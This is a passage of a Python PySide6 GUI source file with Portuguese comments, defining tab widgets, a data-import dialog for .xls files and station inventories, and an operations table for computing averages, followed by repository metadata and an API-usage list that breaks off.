__init__(self, *args, **kwargs):\r\n QTabWidget.__init__(self, *args, **kwargs)\r\n self.setTabBar(TabBar(self))\r\n self.setTabPosition(QTabWidget.West)\r\n\r\n\r\nclass ProxyStyle(QProxyStyle):\r\n def drawControl(self, element, opt, painter, widget):\r\n if element == QStyle.CE_TabBarTabLabel:\r\n ic = self.pixelMetric(QStyle.PM_TabBarIconSize)\r\n r = QRect(opt.rect)\r\n w = 0 if opt.icon.isNull() else opt.rect.width() + self.pixelMetric(QStyle.PM_TabBarIconSize)\r\n r.setHeight(opt.fontMetrics.width(opt.text) + w)\r\n r.moveBottom(opt.rect.bottom())\r\n opt.rect = r\r\n QProxyStyle.drawControl(self, element, opt, painter, widget)\r\n\r\n\r\nclass DatasetDialog(QDialog):\r\n '''\r\n Classe responsável pela janela de diálogo que contém os widgets para importação\r\n de dados através de planilhas .xls ou pelo banco de dados MySQL.\r\n '''\r\n\r\n def __init__(self, master):\r\n QDialog.__init__(self)\r\n self.master = master\r\n self.setWindowTitle(\"Importar dados\")\r\n self.setFixedSize(400, 200)\r\n # self.setWindowIcon(QIcon(r'images\\icon6.ico'))\r\n self.setModal(False)\r\n self.setWindowIcon(master.logo_icon)\r\n\r\n # Widgets\r\n add_button = QPushButton(\"Adicionar\")\r\n cancel_button = QPushButton(\"Cancelar\")\r\n browse_button = QPushButton(\"...\")\r\n BuscaTab = QWidget()\r\n ImportTab = QWidget() \r\n self.empresas = QComboBox(BuscaTab)\r\n self.entidades = QComboBox(BuscaTab)\r\n self.atmos_path = QLineEdit(\"\")\r\n\r\n # Tab Widget\r\n self.tab = QTabWidget()\r\n self.tab.addTab(BuscaTab, \"Buscar\")\r\n self.tab.addTab(ImportTab, \"Importar [ATMOS]\")\r\n\r\n # Configuracoes dos Widgets\r\n self.search_empresas()\r\n self.atmos_path.setReadOnly(True)\r\n\r\n # Layouts\r\n busca_layout = QVBoxLayout()\r\n busca_layout.addWidget(QLabel(\"Empresa\"))\r\n busca_layout.addWidget(self.empresas)\r\n busca_layout.addWidget(QLabel(\"Entidade\"))\r\n busca_layout.addWidget(self.entidades)\r\n BuscaTab.setLayout(busca_layout)\r\n busca_layout.insertSpacing(-1, 100)\r\n #\r\n import_atmos_layout = QVBoxLayout()\r\n import_atmos_layout.addWidget(QLabel(\"Selecionar arquivo\"))\r\n secondary_layout = QHBoxLayout()\r\n secondary_layout.addWidget(self.atmos_path)\r\n secondary_layout.addWidget(browse_button)\r\n import_atmos_layout.addLayout(secondary_layout)\r\n import_atmos_layout.insertSpacing(-1, 100)\r\n ImportTab.setLayout(import_atmos_layout)\r\n #\r\n layout = QVBoxLayout()\r\n layout.addWidget(self.tab)\r\n saveclose_layout = QHBoxLayout()\r\n saveclose_layout.addWidget(add_button)\r\n saveclose_layout.addWidget(cancel_button)\r\n saveclose_layout.insertSpacing(0, 150)\r\n layout.addLayout(saveclose_layout)\r\n self.setLayout(layout)\r\n\r\n # Signals and Slots\r\n add_button.clicked.connect(self.add)\r\n cancel_button.clicked.connect(self.close)\r\n self.empresas.currentTextChanged.connect(self.search_entidades)\r\n browse_button.clicked.connect(self.browse_xls_files)\r\n\r\n def browse_xls_files(self):\r\n '''o comando abaixo abre uma janela para selecao do arquivo e\r\n retorna o caminho ate ele. Se o usuario fechar a janela\r\n retorna uma string vazia'''\r\n startpath = self.master.save_dir\r\n start = os.path.join(startpath)\r\n caminho, x = QFileDialog.getOpenFileNames(self, \"Selecione um arquivo\",\r\n filter = \"Excel files (*.xls)\",\r\n dir= start\r\n )\r\n self.atmos_path.setText(str(caminho)[1:-1])\r\n\r\n def add(self):\r\n if self.tab.currentIndex() == 0:\r\n if not self.master.inventory.get_status():\r\n return None\r\n name_ = self.entidades.currentText()\r\n if not name_ in self.master.signature:\r\n self.master.arquivos.append(\r\n self.master.inventory.extrair_estacao(name_))\r\n self.master.signature.append(name_)\r\n else:\r\n caminho = eval('['+self.atmos_path.text()+']')\r\n if len(caminho) > 0:\r\n self.master.save_dir = os.path.dirname(caminho[0])\r\n for filepath in caminho:\r\n if filepath in self.master.signature: continue\r\n try:\r\n self.master.arquivos.append(utilitarios.xls2file(filepath))\r\n self.master.signature.append(filepath)\r\n except:\r\n continue\r\n\r\n self.master.tabela.update()\r\n return None\r\n\r\n def search_empresas(self):\r\n empresas = self.master.inventory.estacao_empresas\r\n self.empresas.clear()\r\n self.empresas.addItems(np.unique(empresas))\r\n self.search_entidades(self.empresas.currentText())\r\n return None\r\n\r\n def search_entidades(self, empresa):\r\n empresas = np.array(self.master.inventory.estacao_empresas)\r\n if empresas.shape[0] > 0:\r\n entidades = np.array(self.master.inventory.estacao_nomes)[empresas == empresa]\r\n self.entidades.clear()\r\n self.entidades.addItems(entidades)\r\n\r\n return None\r\n\r\n\r\nclass OperationsTable(QTableWidget):\r\n '''\r\n Classe responsável pelo funcionamento da tabela de operações, na aba \"Dados\"\r\n '''\r\n\r\n def __init__(self, master):\r\n super().__init__(master)\r\n \r\n # propriedades da tabela\r\n self.setRowCount(1)\r\n self.setColumnCount(3)\r\n self.setHorizontalHeaderLabels(\r\n [\"\", \"Operação\", \"Agrupar por\"]\r\n )\r\n Header = self.horizontalHeader()\r\n Header.setSectionResizeMode(1, QHeaderView.Stretch)\r\n Header.setSectionResizeMode(2, QHeaderView.Stretch)\r\n Header.resizeSections()\r\n \r\n # variaveis da classe\r\n self.row_track = 0 # controle da linha onde \"+\" esta\r\n self.lista_calculo = [\"Média móvel\", \"Média aritmética\",\r\n \"Média geométrica\", \"Média harmônica\",\r\n \"Máximo\"]\r\n self.agrupar = [\"Não agrupar\", \"Dia\", \"Mês e ano\", \"Ano\"]\r\n\r\n # widgets\r\n self.add_button = QPushButton(text = \"+\")\r\n self.blank_cell1 = QTableWidgetItem()\r\n self.blank_cell2 = QTableWidgetItem()\r\n\r\n # configura widget\r\n self.setCellWidget(self.row_track, 0, self.add_button)\r\n self.blank_cell1.setFlags(self.blank_cell1.flags() & ~Qt.ItemIsEditable)\r\n self.blank_cell2.setFlags(self.blank_cell2.flags() & ~Qt.ItemIsEditable)\r\n self.setItem(self.row_track, 1, self.blank_cell1)\r\n self.setItem(self.row_track, 2, self.blank_cell2)\r\n\r\n # Signals and slots\r\n self.add_button.clicked.connect(self.create_filled_row)\r\n self.resizeColumnToContents(0)\r\n\r\n def create_filled_row(self):\r\n # Inserir linha\r\n self.insertRow(self.row_track)\r\n\r\n # cria widgets\r\n remove_button = QPushButton(text = \"-\")\r\n operation_combo = QComboBox()\r\n groupby_combo = QComboBox()\r\n\r\n # configura widgets\r\n operation_combo.addItems(self.lista_calculo)\r\n groupby_combo.addItems([\"8 horas\"])\r\n self.setCellWidget(self.row_track, 0, remove_button)\r\n self.setCellWidget(self.row_track, 1, operation_combo)\r\n self.setCellWidget(self.row_track, 2, groupby_combo)\r\n\r\n # signals and slots\r\n remove_button.clicked.connect(\r\n self.delete_row\r\n )\r\n operation_combo.currentTextChanged.connect(\r\n self.update_operation_box\r\n )\r\n self.row_track += 1\r\n\r\n return None\r\n\r\n def update_operation_box(self):\r\n row = self.currentRow()\r\n combobox = self.cellWidget(row, 1)\r\n\r\n is_media_movel = combobox.currentIndex() == 0\r\n group_combobox = self.cellWidget(row, 2)\r\n if is_media_movel:\r\n group_combobox.clear()\r\n group_combobox.addItems([\"8 horas\"])\r\n \r\n elif group_combobox.count() == 1:\r\n group_combobox.clear()\r\n group_combobox.addItems(self.agrupar)\r\n \r\n return None\r\n\r\n def delete_row(self):\r\n self.removeRow(self.currentRow())\r\n self.row_track -= 1\r\n\r\n return None\r\n\r\ndef main():\r\n # marca o diretorio do script como atual\r\n path = os.path.dirname(os.path.abspath(__file__))\r\n os.chdir(path)\r\n \r\n # inicia a aplicacao\r\n myappid = 'inea.ArES.1a' # arbitrary string\r\n ctypes.windll.shell32.SetCurrentProcessExplicitAppUserModelID(myappid)\r\n app = QApplication(sys.argv)\r\n w = MainWindow()\r\n w.show()\r\n\r\n # estilos do programa\r\n # print(QFontDatabase().families())\r\n # with open(\"./styles/styles.qss\", \"r\") as f:\r\n # _style = f.read()\r\n # app.setStyleSheet(_style)\r\n\r\n # executa o programa\r\n sys.exit(app.exec())\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n ", "repo_name": "Lucas-Me/ArES-Old", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 49625, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "PySide6.QtWidgets.QFrame", "line_number": 22, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QFrame.HLine", "line_number": 28, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFrame", "line_number": 28, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QFrame.Sunken", "line_number": 29, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFrame", "line_number": 29, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTreeWidget", "line_number": 31, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.ResizeToContents", "line_number": 40, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 40, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 55, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 59, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemIsUserCheckable", "line_number": 60, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 60, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.Checked", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 64, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.Unchecked", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt.Checked", "line_number": 83, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 83, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTreeWidget", "line_number": 91, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 102, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 132, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 133, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 134, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 135, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 136, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 137, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 138, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 139, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 140, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 141, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDoubleSpinBox", "line_number": 142, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 231, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTreeWidgetItem", "line_number": 239, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 249, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 269, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 270, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 271, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLineEdit", "line_number": 272, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 273, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidget", "line_number": 275, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 276, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 277, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 278, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 280, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 281, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 282, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QCheckBox", "line_number": 283, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 284, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 302, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 303, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 306, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 313, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 314, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 316, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 320, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 323, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 328, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 329, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 331, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 334, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 339, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QColorDialog", "line_number": 385, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor.fromRgb", "line_number": 388, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor", "line_number": 388, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 436, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 436, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 452, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 453, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 454, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 455, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor.fromRgb", "line_number": 456, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QColor", "line_number": 456, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 459, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 459, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 470, "usage_type": "name"}, {"api_name": "PySide6.QtGui.QIcon", "line_number": 483, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 488, "usage_type": "call"}, {"api_name": "os.path", "line_number": 488, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 488, "usage_type": "attribute"}, {"api_name": "data_management.Inventario", "line_number": 493, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 499, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 504, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 505, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 506, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 507, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 508, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDateEdit", "line_number": 510, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate.currentDate", "line_number": 510, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate", "line_number": 510, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDateEdit", "line_number": 511, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate.currentDate", "line_number": 511, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate", "line_number": 511, "usage_type": "name"}, {"api_name": "PySide6.QtGui.QIcon.fromTheme", "line_number": 513, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QIcon", "line_number": 513, "usage_type": "name"}, {"api_name": "PySide6.QtGui.QIcon", "line_number": 514, "usage_type": "call"}, {"api_name": "PySide6.QtGui.QAction", "line_number": 515, "usage_type": "call"}, {"api_name": "graphictools.MplCanvas", "line_number": 519, "usage_type": "call"}, {"api_name": "graphictools.NavigationToolbar", "line_number": 520, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 524, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 525, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 526, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 535, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 536, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 538, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 544, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 552, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 556, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 562, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 582, "usage_type": "call"}, {"api_name": "os.path", "line_number": 582, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 583, "usage_type": "call"}, {"api_name": "os.path", "line_number": 583, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 610, "usage_type": "call"}, {"api_name": "os.path", "line_number": 610, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 615, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 618, "usage_type": "call"}, {"api_name": "os.path", "line_number": 618, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 621, "usage_type": "call"}, {"api_name": "json.load", "line_number": 629, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 640, "usage_type": "call"}, {"api_name": "os.path", "line_number": 640, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 641, "usage_type": "call"}, {"api_name": "os.path", "line_number": 641, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 642, "usage_type": "call"}, {"api_name": "os.path", "line_number": 642, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 644, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.WindowNoState", "line_number": 660, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 660, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 673, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 673, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 675, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 675, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 682, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 682, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 684, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 684, "usage_type": "name"}, {"api_name": "numpy.unique", "line_number": 693, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 697, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 697, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 701, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 701, "usage_type": "name"}, {"api_name": "utilitarios.organize", "line_number": 711, "usage_type": "call"}, {"api_name": "utilitarios.rotina_operacoes", "line_number": 723, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 724, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 731, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Critical", "line_number": 731, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 732, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 732, "usage_type": "name"}, {"api_name": "gc.collect", "line_number": 747, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 804, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 811, "usage_type": "call"}, {"api_name": "os.path", "line_number": 811, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QFileDialog.getSaveFileName", "line_number": 812, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QFileDialog", "line_number": 812, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 819, "usage_type": "call"}, {"api_name": "os.path", "line_number": 819, "usage_type": "attribute"}, {"api_name": "utilitarios.save_excel", "line_number": 821, "usage_type": "call"}, {"api_name": "xlsxwriter.exceptions", "line_number": 823, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 824, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Critical", "line_number": 824, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 825, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 825, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 839, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog.__init__", "line_number": 845, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 845, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 854, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 855, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTableWidget", "line_number": 857, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 859, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 860, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLineEdit", "line_number": 861, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGroupBox", "line_number": 864, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QCheckBox", "line_number": 865, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QCheckBox", "line_number": 868, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDateEdit", "line_number": 873, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QDate", "line_number": 873, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 874, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHeaderView.Stretch", "line_number": 880, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QHeaderView", "line_number": 880, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QSpinBox", "line_number": 885, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QGridLayout", "line_number": 892, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 893, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 899, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 900, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 907, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 908, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 909, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 911, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 914, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLabel", "line_number": 915, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 927, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QHBoxLayout", "line_number": 928, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 957, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Warning", "line_number": 957, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 959, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 959, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 965, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QMessageBox.Ok", "line_number": 967, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QMessageBox", "line_number": 967, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTableWidgetItem", "line_number": 979, "usage_type": "call"}, {"api_name": "PySide6.QtCore.Qt.ItemIsEditable", "line_number": 980, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 980, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt.DateFormat", "line_number": 998, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 998, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabBar", "line_number": 1015, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabBar.tabSizeHint", "line_number": 1017, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabBar", "line_number": 1017, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QStylePainter", "line_number": 1022, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyleOptionTab", "line_number": 1023, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyle.CE_TabBarTabShape", "line_number": 1027, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1027, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QRect", "line_number": 1032, "usage_type": "call"}, {"api_name": "PySide6.QtCore.QPoint", "line_number": 1032, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyle.CE_TabBarTabLabel", "line_number": 1040, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1040, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 1044, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabWidget.__init__", "line_number": 1046, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 1046, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QTabWidget.West", "line_number": 1048, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 1048, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QProxyStyle", "line_number": 1051, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QStyle.CE_TabBarTabLabel", "line_number": 1053, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1053, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QStyle.PM_TabBarIconSize", "line_number": 1054, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1054, "usage_type": "name"}, {"api_name": "PySide6.QtCore.QRect", "line_number": 1055, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QStyle.PM_TabBarIconSize", "line_number": 1056, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets.QStyle", "line_number": 1056, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QProxyStyle.drawControl", "line_number": 1060, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QProxyStyle", "line_number": 1060, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 1063, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QDialog.__init__", "line_number": 1070, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QDialog", "line_number": 1070, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1079, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1080, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 1081, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 1082, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 1083, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1084, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QComboBox", "line_number": 1085, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QLineEdit", "line_number": 1086, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QTabWidget", "line_number": 1089, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QVBoxLayout", "line_number": 1098, 